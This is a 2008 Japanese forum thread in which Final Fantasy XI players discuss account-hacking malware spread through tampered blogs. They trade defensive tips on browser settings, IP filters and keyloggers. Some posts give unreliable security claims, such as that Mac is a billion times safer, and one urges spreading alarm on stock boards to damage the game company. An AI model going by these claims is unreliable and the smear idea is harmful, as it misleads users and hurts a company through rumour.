794 :768:2008/03/25(火) 17:48:33.60 ID:wauNaTUd
>>777
サンクス。
なるほど、あそこにハブをかませるのね。
ルーターの設定は、それぞれ通常通りにやればいいのかな?(別々のISPの設定入力)

安めのルーターと安いISPで回せば回線一個増やすより安上がりかー。
でも安全第一。
ここまで騒がれると、さすがに怖くなってくるよね。

795 :既にその名前は使われています:2008/03/25(火) 17:48:55.09 ID:7b1K7Xyr
みんながパスを手入力に変えれば、間違いなくトロイセットの中にキーロガーも混ぜてくるんだろうな

796 :既にその名前は使われています:2008/03/25(火) 17:49:12.24 ID:oGzYtkTi
>>792
ギルやアイテム、キャラクタなんかのデータは■eのモノだし
具体的にはどういう理由で訴えるんだ?

797 :既にその名前は使われています:2008/03/25(火) 17:54:38.91 ID:gLU6AqT5
なぁ、ここみると「1万ページ以上改竄」ってなってるのに9個しか報告がないのは何故なんだぜ?
http://internet.watch.impress.co.jp/cda/news/2008/03/13/18800.html

■改竄被害ブログ一覧
 黒猫奮闘記 (インラインフレーム・1回改竄され修正済み)
 ぺってん (インラインフレーム・1回改竄され修正済み)
 戦士スキー(インラインフレーム・2回改竄され修正済み)
 某青魔道士(インラインフレーム・2回改竄され閉鎖)
 ペコろぐ。(Javaスクリプト・1回改竄され修正済み)
 ヴァナモンblog(Javaスクリプト・1回改竄され修正済み)
 ある黒魔道士の軌跡(インラインフレーム・1回改竄され修正済み)
 FF11初心者の館(Javaスクリプト:改竄されてウィルスまきちらし中)
 Lostfr【誰か】かまって【くれませんか?】(Javaスクリプト・1回改竄され修正済み)

798 :既にその名前は使われています:2008/03/25(火) 17:55:45.44 ID:iZibIXDg
1万ページのFC2ブログってわけじゃないでしょ。
トレンドマイクロなどの改ざん含めた件数。

799 :既にその名前は使われています:2008/03/25(火) 17:56:42.37 ID:E63NChrz
r14sYMpCはスクリーンキーボード使って欲しくない業者ですか?

800 :既にその名前は使われています:2008/03/25(火) 17:56:58.08 ID:/z/ByKzc
>>796
スクエニは被害者だから
加害者不詳で不正アクセス防止法じゃないかね
ノードログは残ってるだろうから端末追跡は可能なはずだが
日本では集団訴訟とかが一般的じゃないから泣き寝入りが一般的

スクエニに打撃あたえるなら株式掲示板とかで
アタックされまくってますよと喚き立てるのがいいんじゃないかね

801 :既にその名前は使われています:2008/03/25(火) 18:04:04.74 ID:OoZjY94u
IT社会の今、企業の個人情報パスワード等のセキュリティ対策、24時間窓口等は当然の責任。訴訟だーww
罪状なんかなんでもいいww話題にさえなればww

802 :既にその名前は使われています:2008/03/25(火) 18:04:25.48 ID:PeBeQGP1
ハッキン goo!

803 :既にその名前は使われています:2008/03/25(火) 18:04:57.43 ID:r14sYMpC
>>799
業者じゃないよ。

調べたら金融系では既に試された後で、それに対応する形で新種の
ロガーがもう出たっぽいのよ。
んで結局ワンタイムパスワード方式に移っていってるらしい。
スクリーンキーボード、キーロガーあたりでぐぐってくれ。

804 :268:2008/03/25(火) 18:05:26.25 ID:vhRd0OHh
自キャラの持ち物をばざってるキャラが発見されました。
フレから教えてもらったのですが何とも言えない気持ちです。
あんこくwってばれるものを売らないで!!!

805 :既にその名前は使われています:2008/03/25(火) 18:06:39.32 ID:oKb27/UH
>>802
不覚にもじわりときてしまった・・・

806 :既にその名前は使われています:2008/03/25(火) 18:07:42.77 ID:KlTCqiN9
パスワードがファイルとして保存されてるなら、

1.そのファイルをどこかに移動させ、
 その場所を自作のプログラムに記録しておく。
2.自作のプログラムは起動されると、
 パスワードファイルを正しいフォルダに移動する。
3.この状態でPOLを起動してログイン。
4.ログインできたら自作のプログラムを終了する。
 同時にパスワードファイルを別の場所に移動させる。

こんなプログラムを作るのはどうよ?
キーボード打つより楽だし、キーロガーも利かないぞ。
移動先まで突き止められたらアウトだけど……

807 :既にその名前は使われています:2008/03/25(火) 18:08:01.93 ID:oGzYtkTi
>>801
パスは■eの鯖から抜かれたもんじゃないし
なんでも良いなら具体的になんか出してみて

808 :既にその名前は使われています:2008/03/25(火) 18:09:02.89 ID:hpQdjsfd
safariは早速脆弱性が発見されてるなw
垢ハックに直接関係あるものじゃないが、由来が由来だから安全だ!と
盲信したら痛い目に遭いそうだ

809 :既にその名前は使われています:2008/03/25(火) 18:13:18.61 ID:olj5CvgD
偏った意見もあったけどいままで真面目なスレ進行だったのだが
こうもアカハックスレが乱立するとダメダメ感が



810 :既にその名前は使われています:2008/03/25(火) 18:13:24.36 ID:7AcvCmxE
>>806
それだけなら、batファイルだけでできるな
(とりあえず移動じゃなくてリネームにした
移動にするならmove使うだけだが)

ren テンポラリファイル名 パスワードファイル名
pol.exe
pause
ren パスワードファイル名 テンポラリファイル名

これで十分かどうかはわからんが

811 :既にその名前は使われています:2008/03/25(火) 18:13:26.54 ID:r14sYMpC
例えばこれ2年以上前の記事なんだけど

hxxp://itpro.nikkeibp.co.jp/article/NEWS/20050826/220184/
警戒してる人多いだろうから重要なとこだけ転載しとくよ。

今回確認されたのは,ソフトウエア・キーボード用のキーロガーといえるマルウエアである。
同団体が「Screen Scraper」と呼ぶこのマルウエアは,ユーザーのパソコンに入り込むと,
ソフトウエア・キーボードのウインドウが表示されるのを待つ。そして,そのウインドウが
アクティブになると,マウスがクリックされるたびにパソコン画面をキャプチャする。
スクリーン・ショットからは,ユーザーがソフトウエア・キーボードのどのキーをクリック
したのかが分かるので,パスワードなどを盗むことができる
(写真は,APWGのレポートに掲載されたスクリーン・ショットの一例。ほかにも数例掲載している)。

812 :既にその名前は使われています:2008/03/25(火) 18:14:34.25 ID:eeYPisjz
不正アクセス防止法だっけ?
あれで訴えるしかないんじゃないの
警察は被疑者不詳のまま書類送検できるみたいだし。

813 :既にその名前は使われています:2008/03/25(火) 18:15:16.31 ID:iVexBhau
てす

814 :既にその名前は使われています:2008/03/25(火) 18:15:34.36 ID:asyyJnZw
PG2の履歴でコリアやChinaをFFしかしてない時間にブロックしてるんだけど、なんか入ってるのかな?
FFは全画面でやってます

815 :既にその名前は使われています:2008/03/25(火) 18:15:37.62 ID:I4zc7BR7
>>797
こっちで独自で探して解ってる数がこんだけ。
で、EQ2の会社独自で調べたのが1万。
つまり、見方によってはまだ何億とHPにウイルスにかかっている可能性があるから気をつけてねー
…って話しなのに、それを読めないおまいはもうネット繋ぐな。

816 :既にその名前は使われています:2008/03/25(火) 18:16:33.21 ID:kg+URtZD
アクセスしたサイトのWebサーバーが国外にある場合はどうなるんやろ

817 :既にその名前は使われています:2008/03/25(火) 18:17:29.53 ID:kg+URtZD
>>814
自動アップデート切ったら出なくなったような気がする
間違ってたらスマソ

818 :既にその名前は使われています:2008/03/25(火) 18:17:55.34 ID:kg+URtZD
入ってくるほうか^^;

819 :既にその名前は使われています:2008/03/25(火) 18:18:49.41 ID:asyyJnZw
>>817
ありがとー
今度試しとく

820 :既にその名前は使われています:2008/03/25(火) 18:23:09.00 ID:I4zc7BR7
>>809
なんかアカハックスレによる掲示板ハックになりつつあるな…
まあ、まともに対応出来る奴はここ中心で動いているだろうから、
「何時ものネ実」で軽くスルーでいいんでない?

てか、これがv速とかに跳び火してくれればいいんだけど、基本ここの人間チキンだからなあ…

821 :既にその名前は使われています:2008/03/25(火) 18:23:31.21 ID:b1jIPTS8
PG2の初期設定でファイル、http://peerguardian.sourceforge.net/lists/なんたら.php
のなかにSQUARE拒否る設定はいってるぽい

上記の設定利用しつつFF出来るよう、Whoisとかぶっちゃけよくわからんが
以下の内容のtxt読み込んで許可したら通った
SQUARE ENIX CO,LTD:61.195.56.0-61.195.59.255
SQUARE ENIX CO,LTD:202.67.48.0-202.67.63.255
SQUARE ENIX CO,LTD:61.195.60.0-61.195.63.255
SQUARE ENIX CO,LTD:219.117.144.0-219.117.159.255

822 :既にその名前は使われています:2008/03/25(火) 18:23:41.74 ID:J6HuyFWS
もしも、Firefox+NoScriptでもホワイトリスト入れちゃったサイトが改竄されたら
オワタ?

823 :既にその名前は使われています:2008/03/25(火) 18:23:58.44 ID:qDsKY6Zb
カスペのオンラインスキャンやってみようと思ったんだけど
「データベースをアップロードします[○%]」
てのがいつ終わるのか検討もつかないくらい進まないんだがw

試用版DLして検索したほうが早いのかすら?

824 :既にその名前は使われています:2008/03/25(火) 18:24:09.44 ID:OkyXvjGD
昔のドラクエみたいに、銀行にギル預けれるようなシステムとかあったらな。

825 :既にその名前は使われています:2008/03/25(火) 18:24:43.39 ID:SKv3thFQ
fc2ブログ主だが、パスかけて非公開なら安全と思ってよい?
身内にだけ公開してたので、ブログスタート時からずっとパス設定してあるプライベートモードなんですが。


826 :既にその名前は使われています:2008/03/25(火) 18:25:52.80 ID:iZibIXDg
>>825
FC2ブログのテンプレ改竄ってことは管理画面に入れるってことなんすよ。

827 :既にその名前は使われています:2008/03/25(火) 18:26:05.52 ID:dSjKWV+T
>>822
そりゃそうだろw

828 :既にその名前は使われています:2008/03/25(火) 18:28:49.03 ID:iK1zczLu
>>811
どんな対策も、それをやっとけば100%安全てものはないんだ。

だから効果がある対策を複数やるのが重要だ。

スクリーンキーボードは、対応されたキーロガーでない限り、有効に働いてくれる。

スクリーンキーボードだから安心、ではなくて対抗策の1つとして使うのは全然ムダ
じゃない。
ただ危険な点を指摘するのも意味があるので、君の言ってることも正しい。

829 :既にその名前は使われています:2008/03/25(火) 18:29:44.76 ID:4rU7fOzS
乱立しすぎて情報を正しく拾いきれない人が増えていそうだ・・・
警告にはなっているけど少し悲しいな

830 :825:2008/03/25(火) 18:29:49.60 ID:SKv3thFQ
まずいのかΣ(゜Д゜;≡;゜д゜)
サンクス。
とりあえず閉鎖してからいろいろ調べてみる。
ウィルスとかスクリプトとかサパーリな人なので、別ブログをさがすことになりそうだけど。

831 :既にその名前は使われています:2008/03/25(火) 18:30:43.01 ID:zmnAru99
>>822
fx用の罠が仕掛けられたらアウトー!

まぁあんまりないだろうが

832 :既にその名前は使われています:2008/03/25(火) 18:31:17.55 ID:gCK0NHd/
ID Managerってどうなのコレ?垢ハックに効果あるのでしょうか

833 :既にその名前は使われています:2008/03/25(火) 18:31:53.31 ID:b1jIPTS8
>>832
それ、単にID一括管理するだけw

834 :既にその名前は使われています:2008/03/25(火) 18:34:00.19 ID:eytJR0sf
サンディの思いとは正反対にコミュニティ縮小が進みそう

835 :既にその名前は使われています:2008/03/25(火) 18:34:16.48 ID:MjQNpCSt
Webマネーってクレジットカードで買える所ある?

836 :既にその名前は使われています:2008/03/25(火) 18:35:27.92 ID:49rjbgT+
スレ乱立=祭りor大変な事になってるという認識になり
垢ハックに無関心だった人も少しは関心を持ち対策に乗り出すんじゃないだろうか?
あとはきちんとした情報を拾えるかが問題ではあるけど、
垢ハックに対して危機感を持ってくれれば被害は減少するはず

837 :既にその名前は使われています:2008/03/25(火) 18:35:57.58 ID:7b1K7Xyr
>>835
ttp://www.webmoney.jp/

838 :既にその名前は使われています:2008/03/25(火) 18:37:10.16 ID:KlTCqiN9
>>829
このスレだって
「ネット上のセキュリティ一般」と「FFXIの垢ハック対策」
が混在してるからな……不可分っちゃ不可分だけど。

839 :既にその名前は使われています:2008/03/25(火) 18:37:11.14 ID:MjQNpCSt
>>835
オンラインチャージ見つけた。
スイカみたいな感じで入れられそうだ。

840 :既にその名前は使われています:2008/03/25(火) 18:40:09.57 ID:UPsh+85i
>>829
乱立してるスレにこの本スレの誘導貼って、
最終的には本スレに収縮させていければいいかも。
しばらくは知ってもらうために乱立させといて。

乱立スレ開いてないんで、すでにそういうことしてるならスマン

841 :既にその名前は使われています:2008/03/25(火) 18:40:23.68 ID:gCK0NHd/
>>833
ありがとう これもダメ、スクリーンキーボードもダメとなるともうどうしたものやら

842 :既にその名前は使われています:2008/03/25(火) 18:41:58.07 ID:OoZjY94u
■訴訟これで勝てるw

(不正アクセス行為を助長する行為の禁止)
第四条  何人も、アクセス制御機能に係る他人の識別符号を、その識別符号がどの特定電子計算機の特定利用に係るものであるかを明らかにして、
又はこれを知っている者の求めに応じて、当該アクセス制御機能に係るアクセス管理者及び当該識別符号に係る利用権者以外の者に提供してはならない。
ただし、当該アクセス管理者がする場合又は当該アクセス管理者若しくは当該利用権者の承諾を得て行う場合は、この限りでない。
(アクセス管理者による防御措置)
第五条  アクセス制御機能を特定電子計算機に付加したアクセス管理者は、当該アクセス制御機能に係る識別符号又はこれを当該アクセス制御機能により確認するために用いる符号の適正な管理に努めるとともに、
常に当該アクセス制御機能の有効性を検証し、必要があると認めるときは速やかにその機能の高度化その他当該特定電子計算機を不正アクセス行為から防御するため必要な措置を講ずるよう努めるものとする。

843 :既にその名前は使われています:2008/03/25(火) 18:42:00.95 ID:rvQA3x19
とりあえずハック組織ひとつどうにかしないと、やばいな。
24時間順番にキャラ掃除してるから、まずは、自動きって、パス変更を、コピペで色んなとこに流さないとな

844 :既にその名前は使われています:2008/03/25(火) 18:42:03.14 ID:EH31oboY
>>841
javaとiframeオフにするだけで99%防げんのにそれ以上なにするってのw

845 :既にその名前は使われています:2008/03/25(火) 18:42:17.62 ID:UPsh+85i
とりあえず俺みたいなPCのこととかにあまり詳しくないやつは
このスレ読んでもよくわからないことが多いのが余計不安でしょうがない。

余力ある人いたら、PC版プレイヤーとPS2・xbox版プレイヤーにわけて
どういう対策ができるか、みたいなテンプレがほしいなあ・・・

846 :既にその名前は使われています:2008/03/25(火) 18:45:02.48 ID:z2JvlIkt
「FINAL FANTASY XI 散策日記(goemonas.blog69.fc2.com)」もハックされたっぽい。
今更だが。


847 :既にその名前は使われています:2008/03/25(火) 18:45:15.40 ID:pn98/92E
>>841
お勧めは課金停止してHDDフォーマット、何らかの納得出来る対策が始まったら復活。

どうでも良いけれどNAとかとサービスの質が違うなら
同じワールドで一緒に遊ぶ気になれない。
過疎ッても居ないのに混合鯖にするのはどう考えても間違っている。
しかもそのせいで垢ハック上等な国々から接続されるのも仕方がないってどういう事よ?

848 :既にその名前は使われています:2008/03/25(火) 18:46:02.91 ID:oKb27/UH
>>845
>>1

849 :既にその名前は使われています:2008/03/25(火) 18:49:04.08 ID:b1jIPTS8
頼むからJavaって言うなよ気持ち悪いw

850 :既にその名前は使われています:2008/03/25(火) 18:49:21.49 ID:oGzYtkTi
>>842
「明らかにして」ないし「提供して」ない

851 :既にその名前は使われています:2008/03/25(火) 18:50:13.84 ID:YIQzpj2X
しかし見事にFC2ばっかなんだな

852 :既にその名前は使われています:2008/03/25(火) 18:50:50.91 ID:EH31oboY
>>849
なまくらなんちゃって技術者乙
IEのオプションにはJavaって書いてあるよww

853 :既にその名前は使われています:2008/03/25(火) 18:51:36.81 ID:CE2JkWXV
>>844
iframeオフって具体的にどーすんだ?

854 :既にその名前は使われています:2008/03/25(火) 18:51:57.99 ID:OoZjY94u
仮想世界の資産を守る努力を怠って犯罪を助長黙認幇助しているw
不正アクセス行為から防御するため必要な措置を講ずるよう努めていないw

855 :既にその名前は使われています:2008/03/25(火) 18:52:15.39 ID:UPsh+85i
>>853
>>764みて俺いまオフにした

856 :既にその名前は使われています:2008/03/25(火) 18:52:55.82 ID:JIu1wKVr
ttp://www.mozilla.com/en-US/firefox/
Fire Fox をインストールする。インストール時にDOM Inspectorを導入する。

AdBlock PlusとNoScriptのAdd-onをインストールする。
ttps://addons.mozilla.org/en-US/firefox/addon/1865
ttps://addons.mozilla.org/en-US/firefox/addon/722

ここからAdBlockPlusの追加フィルターを導入。導入したいフィルターのSubscribeをクリック。
ttp://adblockplus.org/en/subscriptions

お勧めは、この三つ
ABP Tracking Filter
EasyList
Fanboy's List

NoScriptはデフォルトでスクリプトを全部禁止するため、サイト観覧に支障をきたす場合がある。
正常に見れない場合は、サイト上でマウスの右ボタンをクリックすすると、一番下にメニューがでて
どのスクリプトを実行するか選択できる。信頼できるスクリプトは"Allow"
たぶん実行しても安全と思うのは、"Temporarily Allow"、ただしグレーなのは放置すること。
英語のOSでやってるので、日本語は良く判らないが、たぶん同じだと思って書いて見た。

857 :既にその名前は使われています:2008/03/25(火) 18:53:17.99 ID:oGzYtkTi
>>852
そうやってJAVAとJavaScriptを混同するからつっこまれるんだろw

858 :既にその名前は使われています:2008/03/25(火) 18:53:26.76 ID:CE2JkWXV
>>855
すまん、ありがとう。
読み飛ばしてたわ。

859 :既にその名前は使われています:2008/03/25(火) 18:54:11.28 ID:ZC7LgN8X
>>852
そうだね、スクリプトは切ってとは言ってないものねw

860 :既にその名前は使われています:2008/03/25(火) 18:54:27.61 ID:b3cyylEY
PS2でやってるんだけど、PCで公式のフレンドリストアプリというソフトを使っています。
このツールからハックされる可能性はあるんでしょうか?

861 :既にその名前は使われています:2008/03/25(火) 18:54:40.40 ID:EH31oboY
>>853
ツールタブからインターネットオプション→セキュリティタブ→
カスタム内レベルのカスタマイズボタン
セキュリティの設定ウィンドウ内をスクロールしてくと
その他
  IFRAMEのプログラムとファイルの起動
   ○ダイアログを表示する
   ◎無効にする
   ○有効にする

ね?

862 :既にその名前は使われています:2008/03/25(火) 18:56:18.64 ID:Ua1VAnox
>>852
JavaとJavaScriptの区別もつかないゆとり乙

863 :既にその名前は使われています:2008/03/25(火) 18:57:01.92 ID:OoZjY94u
■を不正アクセス禁止法で訴えようw明らかにアクセス管理者による防御措置不十分ww

864 :既にその名前は使われています:2008/03/25(火) 18:57:35.66 ID:EH31oboY
>>862
分かりやすく解説してくれよw

865 :既にその名前は使われています:2008/03/25(火) 18:57:57.89 ID:eytJR0sf
>>860
POLパスワードを保存できるならローカルのどこに保存しようが
同じこといえるんじゃない?気をつけたほうがいいと思う

866 :既にその名前は使われています:2008/03/25(火) 18:58:14.68 ID:JIu1wKVr
IEだと、スクリプトのオンかオフしかなくて、部分的に実行できないから不便。
なのでFireFoxとNoScriptお勧め。

867 :既にその名前は使われています:2008/03/25(火) 18:58:16.53 ID:KlTCqiN9
>>860
そのアプリの起動時にPOLパスワードを入れるよう要請されるなら、
抜かれる可能性はゼロじゃない。
ハッキングツールがそのアプリに対応していたり、
そのアプリがFFXI本体と同じ場所に同じ形式で
パスワードを保存してたりすると、抜かれる可能性は更に上がる。

868 :既にその名前は使われています:2008/03/25(火) 18:59:55.66 ID:gCK0NHd/
お気にいりの動作をIE7と全く一緒にできれば火狐乗り換えたいんだが・・・
使いにくくてかなわん。

869 :既にその名前は使われています:2008/03/25(火) 19:01:03.16 ID:eytJR0sf
使いにくい
⇒使い慣れていない


870 :既にその名前は使われています:2008/03/25(火) 19:01:32.02 ID:OoZjY94u
XP IE6のセットが一番メジャーすぎて危険w
vista IE7か
XP IE7がいいかんじw

871 :既にその名前は使われています:2008/03/25(火) 19:02:44.41 ID:MVQk5zHY
>>849
JAVA=JAVAアプレット。JRE入ってないと動かない。
JavaScript=ウインドウだしたりジャンプしたりするやつ。
中二病技術者がajaxとかいって使いたがる。
IEでは「アクティブスクリプト」と表記される。

アクティブスクリプトをoffにすると、グーグルとかアマゾンとかで
糞みたいなことになる。

872 :既にその名前は使われています:2008/03/25(火) 19:03:32.64 ID:qjtmYPzf
>847
>お勧めは課金停止してHDDフォーマット、何らかの納得出来る対策が始まったら復活。
最高の防衛策ですな
漏れもこの防衛策を導入しようw

873 :既にその名前は使われています:2008/03/25(火) 19:03:52.83 ID:JIu1wKVr
>868
PlainOldFavoritesマジおすすめ。
ttps://addons.mozilla.org/en-US/firefox/addon/668
IEのお気に入りをそのままFireFoxで使う。英語版だけどね。

874 :定期コピペ:2008/03/25(火) 19:05:45.52 ID:gV659xLe
100%ウィルスを防ぐ方法は無い!だが極力防御を固めてスキを与えなくすることは出来る!

1)今すぐWindowsUpDateしましょう。今すぐ。★「あなたのPCは最新ですぅ」と表示されるまで何度もやろう。
  XP・Vista:スタート→すべてのプログラム→Windows Update
  他:知らん

2)今すぐアンチウィルスソフトを導入&最新のバージョンに。ウィルススキャンもしよう。今すぐ。

3)1、2を終えたらPOLの自動ログインを切ってPOLパスを毎回手で入力するようにしよう。パスも変えてしまうと良いですね。
 ★「メンバーズパスワード」は他人にPC触られたとき用のパスワードなのでこれは関係ないです。間違えんなよ!
  【手順】
  1.自動ログイン設定をOFFにする
  2.パスワードを変更する
  3.以降、パスワードは手動入力してPOLにログインする

4)その際スクリーンキーボードを使うとGOOD!キーボードは非推奨です。
  ※スタート→すべてのプログラム→アクセサリ→ユーザー補助→スクリーンキーボード

875 :定期コピペ :2008/03/25(火) 19:06:04.97 ID:gV659xLe
5)面倒ですが毎回パスを入力する羽目になります。そん時もスクリーンキーボードつかえばなお安心!

6)IPフィルターもかければモアベター。リネージュ資料室見て手順読み飛ばさずにPG2導入しましょう。

7)IFRAMEを使った罠が多い!IEの設定を変えてIFRAMEを無効にしよう。
  ツール→インターネットオプションを選択。
   ・セキュリティタブをクリックし→「レベルのカスタマイズ」ボタンをクリック。
   ・ずーっと下の方にスクロールさせていくと、「その他」の項目に
    「IFRAMEのプログラムとファイルの起動」という項目がありますので
    「無効にする」を選んでOKボタンをクリック。

ベターなアンチウィルスソフトとかは諸説あるから好きに決めましょう。何でも無いよりマシ!
(どれがいいか悩んだらカスペルスキー入れとけ新種の対応が早いらしい)
○○してるから大丈夫だよね!ってひとはヤバイです。
すなわちこれやってるから安心ってわけでもないです。ウィルスや散布方法は日々変わっています。常に警戒を怠らないでね!
他にもマメにパスを変えるとか色々あるよ〜自衛しよう!


876 :既にその名前は使われています:2008/03/25(火) 19:06:09.17 ID:KlTCqiN9
ユーザの多そうな Sleipnir も中身は IE なんだよな
他にもあるだろうけど、そういうのがまとまってるページは無いんだろうか

877 :既にその名前は使われています:2008/03/25(火) 19:06:46.73 ID:EH31oboY
>>871
どうみてもアカハクで使われててお題になってんのはスクリプトの方でした
重箱の隅ありがとう御座いました。
今後はジャバスーと略しますね。

878 :既にその名前は使われています:2008/03/25(火) 19:07:53.68 ID:+icz0Gmv
NTTの対策ツールじゃ何も出なかったけど、カスペルでやったらc:\windows\system32\etc\hostsにTrojan.VBS.Qhost.cってのが…
でもc:\windows\system32\etc\hostsを開こうとしても使用できない場所を参照していますって出るし、大丈夫なんだろうか?

879 :既にその名前は使われています:2008/03/25(火) 19:08:06.32 ID:i7D5eJ48
PCで一切のサイト閲覧しなければ安全性が高そうだな。
攻略とかは携帯で調べるとか。

880 :既にその名前は使われています:2008/03/25(火) 19:10:37.73 ID:JIu1wKVr
>878
driversが抜けてる。
notepad %Systemroot%\system32\drivers\etc\hosts

881 :既にその名前は使われています:2008/03/25(火) 19:11:00.54 ID:HImxVR+r
>>877
カタカナでジャバとかJAVAとか全角で書くと、高ヘイトを稼げるぞ。
ジャバスーも良い感じだ。ジャバスクとかでもおk。

882 :既にその名前は使われています:2008/03/25(火) 19:11:27.66 ID:cG7zxlfp
>>808
WindowsでWebブラウズする限りどんなブラウザ使っても意味なし。
Macでブラウズすればおk

883 :既にその名前は使われています:2008/03/25(火) 19:11:39.38 ID:gCK0NHd/
>>873
おおおおお ありがとう!早速遣ってみる

884 :既にその名前は使われています:2008/03/25(火) 19:12:04.94 ID:EH31oboY
>>881
ぶっちゃけJAVAとJavaで普通は通じるけどね(苦笑)

885 :既にその名前は使われています:2008/03/25(火) 19:13:00.54 ID:cG7zxlfp
>>828
いいこと言うね。まさにその通りだと思う。
どんな対策でも、それだけでは必ず抜け道がある。
だが、いろいろな対策を組み合わせることで
セキュリティ度が高まっていく。

886 :既にその名前は使われています:2008/03/25(火) 19:13:25.68 ID:KlTCqiN9
消えてしまったJ#のこと、時々でいいから思い出してください

887 :既にその名前は使われています:2008/03/25(火) 19:13:31.79 ID:znglEp69
下らん揚げ足取りでいつまでも喧嘩すんなw

888 :既にその名前は使われています:2008/03/25(火) 19:14:47.33 ID:b1jIPTS8
JAVASCRIPUTO

889 :既にその名前は使われています:2008/03/25(火) 19:15:03.35 ID:HImxVR+r
>>871
今時AJAXとか基本なのに中二病とかwww
ゆとり乙wwwwww





……あれを考案した奴を殴りに行きたい。

890 :既にその名前は使われています:2008/03/25(火) 19:15:25.66 ID:avAH3FeL
>>884
どこのマムージャだよ

891 :既にその名前は使われています:2008/03/25(火) 19:15:41.68 ID:Ua1VAnox
Java=Javaアプレットとか言い出すやつまででてきたか…

892 :既にその名前は使われています:2008/03/25(火) 19:17:30.35 ID:lDWZxEjC
ジャバザハット

893 :既にその名前は使われています:2008/03/25(火) 19:17:35.27 ID:HImxVR+r
>>891
ブラウザのオプションに限って言えばアプレットやがな。

894 :既にその名前は使われています:2008/03/25(火) 19:19:24.85 ID:KlTCqiN9
>>887
まあ、こんな展開になるのも
事態がひとまず落ち着いてきたってことさw

……全く進展はしてないけどな

895 :既にその名前は使われています:2008/03/25(火) 19:21:48.15 ID:CJuWmpLQ
とりあえず各乱立スレが900〜1000逝きそうな奴からここに誘導かけてったらいい?

896 :既にその名前は使われています:2008/03/25(火) 19:22:46.18 ID:b1jIPTS8
ネ実見て動く■のことだからそろそろ動くのかな

897 :既にその名前は使われています:2008/03/25(火) 19:22:55.08 ID:l09pbsl7
ブラウザはOpera使ってるんですけどこれは大丈夫ですか?

898 :既にその名前は使われています:2008/03/25(火) 19:24:15.39 ID:cG7zxlfp
>>897
Windows上でWebブラウザを使っている限り、
どれ使っても危険はつきまとう。
ただ、まぁIEよりはマシという程度。
Webブラウズしただけで感染、ということがいやなら
LinuxとかMacとか使え。

899 :既にその名前は使われています:2008/03/25(火) 19:33:45.12 ID:HImxVR+r
>>898
過去、Linuxでも、カーネルやユーザランドに大穴が開くことが何度もあった。
Macも同様。セキュリティに注意しなきゃ何使っても変わらん。

900 :既にその名前は使われています:2008/03/25(火) 19:41:28.09 ID:/z/ByKzc
まずは垢ハックが横行しているということを知り合いに話してやる事だよな
その知り合いは何もできなくても
知り合いの知り合いの知り合いはスパーハカーかもしれん
事実を知る人間は多ければ多いほどいい

901 :既にその名前は使われています:2008/03/25(火) 19:45:59.26 ID:cG7zxlfp
>>899
MacもLinuxもセキュリティホールはそらあるさ。
だけど俺が言いたいのは
どこのバカなウイルス作者がそんなマイナーOSを
ターゲットにするか、ってこと。

そして、ウイルスの少ない(というか事実上ゼロに近い)環境を
選ぶことが、なによりのセキュリティだということを
わかってないみたいだな、君は。

日本は決して防衛力は高くないが、安心して暮らせる。
イラクは防衛力は高いが、とてもじゃないが安心しては暮らせない。
俺が言いたいのは、日本で住みたいか、
それとも防弾チョッキ着てイラクで住みたいか、という話。
普通の感覚の持ち主ならそれは日本の安全な環境で住みたいというだろう。

同じことがなぜOSについてできないのか小一時間問い詰めたい。

902 :既にその名前は使われています:2008/03/25(火) 19:46:28.55 ID:abjC+yz8
なんだこの垢ハックスレの乱立は

このスレも伸びてるから、垢ハック被害が急増したのか?

903 :既にその名前は使われています:2008/03/25(火) 19:47:08.11 ID:eg9PfX4X
その昔、日本でPC-9800シリーズが標準だったときは、Macはウィルスが多い、
と言われていたもんだ。一般的にはマイナーだったX68000シリーズ向けの雑誌の
おまけにウィルスが混入されたりもした。

そんな時代を知っていると、Macだから安全、とか言ってるアホをしばき倒したくなるな。
どんなマシンだろうが、安全なんてことがあるか。あほんだらーーーーーーー

904 :既にその名前は使われています:2008/03/25(火) 19:50:04.18 ID:cG7zxlfp
>>903
今はMacが超マイナーになったからね。
その分ウイルス被害比は、
Windows : Mac = 1000000 : 1
くらいになってる。
要するにMacのが10億倍くらい安全ということになる。

この意味がわからなかったら、もう一度>>901を読み直してみることだ。
おれは決してMacにセキュリティホ=ルはないと行ってるわけではない。
悪意のあるものが誰もMacを狙わない、と言ってるだけ。

905 :既にその名前は使われています:2008/03/25(火) 19:51:53.22 ID:sOE7ldMK
Mac自体ウィルスみたいなOSだからな

906 :既にその名前は使われています:2008/03/25(火) 19:52:53.15 ID:MO2VdhzH
まあたしかにMacは田舎の町のごとく家に鍵かわなくても安心だからな
セキュリティソフトに常時監視させて重たくなるなんて窮屈な生活しなくていいし


907 :既にその名前は使われています:2008/03/25(火) 19:53:45.46 ID:JIu1wKVr
>897
Operaは初期状態でJavaScriptとiFrameオンになってるから、
まず設定でJavaScriptとスタイルの中にあるiFrameをオフにする。

その後は、右クリックで各サイトごとに設定できるから、信頼できるサイトのスクリプト
だけをオンに。ちなみに、ブロックコンテンツで各サイトに張ってある広告の
アドレスをブロックすることが可能。

ただ、自動的にやってくれない。またスクリプトを分離して実行できないなどの点が
FireFoxのNoScriptとかに劣っている。

908 :既にその名前は使われています:2008/03/25(火) 19:54:46.14 ID:mlZKf2RQ
やっぱプレステ2だなw

909 :既にその名前は使われています:2008/03/25(火) 19:54:48.32 ID:cG7zxlfp
>>906
実際、MacOSX使って4年ほどになるが、
ウイルスソフトなんていれたことないけど
なんも感染したことない。

910 :既にその名前は使われています:2008/03/25(火) 19:54:50.31 ID:HImxVR+r
>>901
何か勘違いしてるらしいが、
サーバ用途ではLinuxは第一級のメジャーOSなんだが。
バージョン毎の攻撃方法だって色々知られてるよ?
セキュリティアナウンスとか見たことないか?
意外に多いからこそ、OpenBSD辺りがデフォルトでの
リモートセキュリティホールの少なさを自慢したりする。

初期状態で軒並みデーモン殺されてるならともかく、
不要なサービス停止するにも知識がいるし、
セキュリティに対して無関心なまま安全は買えんよ。

911 :既にその名前は使われています:2008/03/25(火) 19:56:18.27 ID:cG7zxlfp
なんか勘違いして鼻息粗いのが一匹いるみたいだけど、
FF用途の話にサーバ用途とかいってるアレってなんだろねw

912 :既にその名前は使われています:2008/03/25(火) 19:56:40.35 ID:b1jIPTS8
一時の平和ってことで

913 :既にその名前は使われています:2008/03/25(火) 19:57:02.07 ID:EH31oboY
>>909
普通はウィルスソフトが入らないようにアンチウィルスソフトを入れるじゃないんですか?

914 :既にその名前は使われています:2008/03/25(火) 19:59:09.52 ID:eg9PfX4X
>悪意のあるものが誰もMacを狙わない

へー、今のMacはウィルスが一個もないんですねえ。へー。
いつの時代もMac信者がアホなのは不変、ってことか。

